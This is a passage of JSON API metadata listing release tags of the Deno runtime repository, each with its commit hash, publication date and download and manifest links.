s/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.6/manifests"},{"name":"v2.1.5","sha":"d15a95e28b0ec015c2f2a88cca3882ba96d5da98","kind":"commit","published_at":"2025-01-09T20:55:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.5/manifests"},{"name":"v2.1.4","sha":"b32ed7516cfdaaff76203ca530796d6a1235568d","kind":"commit","published_at":"2024-12-11T03:31:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.4/manifests"},{"name":"v2.1.3","sha":"7f9b1ff30f7d9880b7c825c2b5f2de3137343d76","kind":"commit","published_at":"2024-12-05T23:36:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.3/manifests"},{"name":"v2.1.2","sha":"2039abe8d2bc82fa800f4118707a48ac6f5e02ae","kind":"commit","published_at":"2024-11-28T15:45:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.2/manifests"},{"name":"v2.1.1","sha":"5d71b461530f7c374c08701cef5678a5a4ac5484","kind":"commit","published_at":"2024-11-21T17:28:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.1/manifests"},{"name":"v2.1.0","sha":"3da4eca7c1ed97906654671669e0bb3b095bc637","kind":"commit","published_at":"2024-11-21T02:05:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.0/manifests"},{"name":"v2.0.6","sha":"8f59d18202e94e5c54ad7e5a79ec1383159e4a20","kind":"commit","published_at":"2024-11-10T04:38:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.6/manifests"},{"name":"v2.0.5","sha":"78a799b4947461eb5c6092295cbcdabfe94053f7","kind":"commit","published_at":"2024-11-06T00:19:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.5/manifests"},{"name":"v2.0.4","sha":"b7c282d2f80b12b0b2a435780fb0ea2b236ab224","kind":"commit","published_at":"2024-10-30T00:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.4/manifests"},{"name":"v2.0.3","sha":"997bd47fc27ad920f3388c94a95829ff45394c84","kind":"commit","published_at":"2024-10-25T00:57:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.3/manifests"},{"name":"v2.0.2","sha":"22a79ea420e67e783d996d5d1d64983192cb3dd8","kind":"commit","published_at":"2024-10-17T23:28:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.2/manifests"},{"name":"v2.0.1","sha":"99c2aa573057e337f3474d43a7aab8c5e6b4caa2","kind":"commit","published_at":"2024-10-16T22:42:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.1/manifests"},{"name":"v2.0.0","sha":"a62c7e036ab6851c0293f407ead635a7331445b7","kind":"commit","published_at":"2024-10-08T14:37:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.0.0/manifests"},{"name":"v1.46.3","sha":"a98e146a55b209458160bcd148497310a9e14441","kind":"commit","published_at":"2024-09-04T12:12:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.3/manifests"},{"name":"v1.46.2","sha":"1b62d42631013724432f1ba4a3b04f506450abba","kind":"commit","published_at":"2024-08-29T16:07:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.2/manifests"},{"name":"v1.46.1","sha":"de11ff8c556c6922f832f639f54e5f7a6a3096b9","kind":"commit","published_at":"2024-08-22T14:18:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.1/manifests"},{"name":"v1.46.0","sha":"3314a0ceb8f874986d5da9f36f683740bd813750","kind":"commit","published_at":"2024-08-22T00:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.46.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.46.0/manifests"},{"name":"v1.45.5","sha":"52fd273834c0675f651577e23785d76f67423ab1","kind":"commit","published_at":"2024-07-31T19:11:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.5/manifests"},{"name":"v1.45.4","sha":"c0b1d19d559bfb1fbb65675b3849a9c0396d131f","kind":"commit","published_at":"2024-07-26T16:38:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.4/manifests"},{"name":"v1.45.3","sha":"87ce64e57486fc006e82806c9ed8c49f11c2cb73","kind":"commit","published_at":"2024-07-22T21:34:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.3/manifests"},{"name":"v1.45.2","sha":"85de4280a1f9fae572a7331db6344cee123ddab7","kind":"commit","published_at":"2024-07-12T20:04:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.2/manifests"},{"name":"v1.45.1","sha":"c841d163e3dc344c06f10579672cc5e2b095933f","kind":"commit","published_at":"2024-07-11T18:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.1/manifests"},{"name":"v1.45.0","sha":"04ff5c731d55f2402e7b08e378eaf6e5a5a4d961","kind":"commit","published_at":"2024-07-10T22:08:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.45.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.45.0/manifests"},{"name":"v1.44.4","sha":"892e7c20ac6e7bc0601f4c23e64f43187c1b8479","kind":"commit","published_at":"2024-06-19T16:28:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.4/manifests"},{"name":"v1.44.3","sha":"ab2ab0f7fc4e7bda16544ef96a5e6ba114e799b5","kind":"commit","published_at":"2024-06-19T00:19:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.3/manifests"},{"name":"v1.44.2","sha":"9ca1320746072001feab9f6a26e9c1518609bd7b","kind":"commit","published_at":"2024-06-13T00:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.2/manifests"},{"name":"v1.44.1","sha":"e02a32be2797f7c107d19da8bf2aff5bbcd97bad","kind":"commit","published_at":"2024-06-05T23:05:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.1/manifests"},{"name":"v1.44.0","sha":"f3ffffc682604349b96dbe4ad33daa5dd1a09f63","kind":"commit","published_at":"2024-05-30T05:58:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.44.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.44.0/manifests"},{"name":"v1.43.6","sha":"7df3d5aeec14f24e5fdec1e1e6f5739f1fbeebbe","kind":"commit","published_at":"2024-05-21T23:34:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.6/manifests"},{"name":"v1.43.5","sha":"a13c4531fd2c08617767cc8a0788b9e20ac27d45","kind":"commit","published_at":"2024-05-18T00:22:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.5/manifests"},{"name":"v1.43.4","sha":"d64921c1906ee1ac39230c16abe9ff8c546bd645","kind":"commit","published_at":"2024-05-16T23:28:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.4/manifests"},{"name":"v1.43.3","sha":"d6ad253882a6c066e0c673ff64e6554a37bb3487","kind":"commit","published_at":"2024-05-10T20:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.3/manifests"},{"name":"v1.43.2","sha":"acd75bbd75fdf46c213d7b21093e09349318da5d","kind":"commit","published_at":"2024-05-08T22:21:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.2/manifests"},{"name":"v1.43.1","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.1/manifests"},{"name":"v1.43.0","sha":"5ff881a0737eccceed55a0ace3ef3110d5b72b2f","kind":"commit","published_at":"2024-05-01T06:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.43.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.43.0/manifests"},{"name":"v1.42.4","sha":"7cb23c5e3ee0b6c416f4c0e34c7c63fdf5024138","kind":"commit","published_at":"2024-04-16T00:17:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.4/manifests"},{"name":"v1.42.3","sha":"a64a257024c9933d90494613ac6b302cc69df6fa","kind":"commit","published_at":"2024-04-12T00:54:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.3/manifests"},{"name":"v1.42.2","sha":"04c0a4cbf7c00811d3ace3184c1cb8597a0e88f1","kind":"commit","published_at":"2024-04-11T06:39:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.2/manifests"},{"name":"v1.42.1","sha":"08f0613b390b289d07c6ea165bed0518809b34e8","kind":"commit","published_at":"2024-04-01T06:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.1/manifests"},{"name":"v1.42.0","sha":"9c6eca1064de029e560377bef831e69d22c5c00b","kind":"commit","published_at":"2024-03-28T00:47:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.42.0/manifests"},{"name":"v1.41.3","sha":"0d7662e1556a60bcc4b7075752fb2c2842b1afea","kind":"commit","published_at":"2024-03-14T18:13:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.3/manifests"},{"name":"v1.41.2","sha":"6d062cf0c79158a8c0c8a136c945c3eab2af8b50","kind":"commit","published_at":"2024-03-08T07:32:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.2/manifests"},{"name":"v1.41.1","sha":"8ccb9e954548d1a4d3ccbe065c28d6067d3fda03","kind":"commit","published_at":"2024-03-01T00:25:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.1/manifests"},{"name":"v1.41.0","sha":"118445103b019fbeb50eadc8d09d450fa8c33eee","kind":"commit","published_at":"2024-02-22T01:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.41.0/manifests"},{"name":"v1.40.5","sha":"2c97831fec0d335a474c4a599a5df345a23ef036","kind":"commit","published_at":"2024-02-15T05:22:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.5/manifests"},{"name":"v1.40.4","sha":"49214d309fc373a80a02f57545131b15f7813a98","kind":"commit","published_at":"2024-02-08T11:05:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.4/manifests"},{"name":"v1.